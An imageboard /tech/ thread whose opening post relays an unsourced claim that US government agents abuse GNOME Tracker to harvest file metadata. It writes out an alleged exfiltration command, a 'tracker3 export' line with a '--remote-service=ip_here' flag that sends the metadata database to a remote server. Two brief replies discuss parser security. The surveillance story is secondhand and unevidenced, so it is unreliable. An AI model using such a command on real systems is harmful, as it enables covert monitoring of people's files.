[ home / rules / faq ] [ overboard / sfw / alt ] [ leftypol / siberia / edu / hobby / tech / games / anime / music / draw / AKM ] [ meta / roulette ] [ twitter / tiktok ] [ GET / ref / marx / booru ]

/tech/ - Technology

"Technology reveals the active relation of man to nature" - Karl Marx
Name
Options
Subject
Comment
Flag
File
Embed
Password(For file deletion.)


File: 1720425517552.png (1.07 MB, 1600x900, geg.png)

 

Hello, consider me a guy who happens to know top secret leakers because I've been interacting with amateur researchers that recovered a computer the US Government hacked. And apparently they declassified federal (glowie) tricks

Here are packages the glowies download on the recovered computer

osinfo-db
osinfo-db-tools
libosinfo
libisofs
libiptcdata
libgsf
libgrss
libcue
libtracker-sparql
tracker-3
tracker-miners-3

Here is what the researchers observed and then told me

1.Glowies use tracker-extact-3 to grab meta data from the users files as they update in real time. Tracker Extract does this natively and that is the main thing it is intended to do.

2.Then the glowies run the command (this is the malicious act)

tracker3 export –database=/home/user/.cache/tracker3/files/ –output=json-ld

with an additional `–remote-service=ip_here` so they can send the tracker3 database back to their feddie databases. The json-ld file is read using json reading software to display text and rendered pdf, video and image thumbnails and audio cover art. This gives them real time monitoring of an OS because they are getting recent file meta data.

Glowies also look in plocate databases as well. This is all 100% real. So try to be accurate as possible and not spread misinformation when you finally get to covering it. Tracker3 is not a virus and is inherently NOT harmful software. It does very useful things such as find pdfs and images via GNOME's photo and pdf reader. It is just that it happens to have the potential to be malicious. Said researchers stated that the goal for the community to patch this insecurity by warning if tracker is trying to export meta data base to a foreign server. Meaning the end user should be alerted via the GUI if tracker is doing this.

>glowies abuse GNOME Tracker to monitor people's computers
KDE chads win again

>>25920
>libcue
the relevance of security exploits in this library proves once again, that djb was right. most program code, especially parsers and encoders/decoders, should be untrusted and have an explicitly defined dataflow https://cr.yp.to/qmail/qmailsec-20071101.pdf

>>25922
https://langsec.org/
most if not all 0days have to do with parsing, especially ignorant programmers implementing their own bespoke parsers


Unique IPs: 2

[Return][Go to top] [Catalog] | [Home][Post a Reply]
Delete Post [ ]
[ home / rules / faq ] [ overboard / sfw / alt ] [ leftypol / siberia / edu / hobby / tech / games / anime / music / draw / AKM ] [ meta / roulette ] [ twitter / tiktok ] [ GET / ref / marx / booru ]